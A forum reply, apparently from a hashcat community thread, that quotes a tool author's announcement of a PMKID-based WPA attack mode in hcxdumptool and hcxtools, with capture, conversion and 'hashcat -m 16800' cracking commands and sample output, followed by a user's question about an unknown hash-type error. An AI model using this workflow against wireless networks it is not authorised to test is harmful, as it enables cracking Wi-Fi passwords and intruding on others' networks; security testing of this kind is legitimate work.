hcxtools - solution for capturing wlan traffic and conversion to hashcat formats
(07-25-2018, 08:44 PM)ZerBea Wrote: Small update on hcxdumptool and hcxtools: moved to v 4.2.0 rc1:
Added complete new WPA attackmode according to new hashcat hashmodes 16800 and 16801. The attack is performed on the RSN IE (Robust Security Network Information Element) of an EAPOL 1/4 frame.
At this moment we do not know on which vendors and on how many routers this will work. Please test it...
Also hcxdumptool isn't ready for a 100% attack - I'm working on it.

$ hcxpcaptool -h
-z <file> : output PMKID file (hashcat hashmode -m 16800)
-Z <file> : output PMKID file (hashcat hashmode -m 16801)

Advantage:
only 2 packets required
1 associationrequest/reassociationrequest (proberesponse is ok, too)
2 EAPOL 1/4 (M1) with included RSN IE

Remember ap-less attack:
only 2 packets required
1 associationrequest/reassociationrequest (proberequest is ok, too)
2 EAPOL 2/4 (M2) as response to hcxdumptool

Just use hcxdumptool to capture, hcxpcaptool to convert and hashcat to crack

hcxtools update: 4.2.0 rc1
added new attack mode on WPA PMKID

$ hcxpcaptool -z hashfile.16800 pmkidassociationrequest.pcapng
start reading from pmkidassociationrequest.pcapng
summary:                                        
file name....................: pmkidassociationrequest.pcapng
file type....................: pcapng 1.0
file hardware information....: unknown
file os information..........: unknown
file application information.: unknown
network type.................: DLT_IEEE802_11_RADIO (127)
endianess....................: little endian
read errors..................: flawless
packets inside...............: 3
skipped packets..............: 0
packets with FCS.............: 0
association requests.........: 1
association responses........: 1
EAPOL packets................: 1
EAPOL PMKIDs.................: 1

1 PMKID(s) written to hashfile.16800

$ hashcat -m 16800 hashfile.16800 wordlist

example hashes are here:
https://hashcat.net/wiki/doku.php?id=example_hashes



Hashcat -m 16800?????? where?
Unknown hash-type '16800' selected
Reply


Messages In This Thread
wlandump-ng vs hcxdumptool - by hulley - 02-10-2018, 10:26 PM
RE: hcxtools - solution for capturing wlan traffic and conversion to hashcat formats - by strike1953 - 07-25-2018, 10:40 PM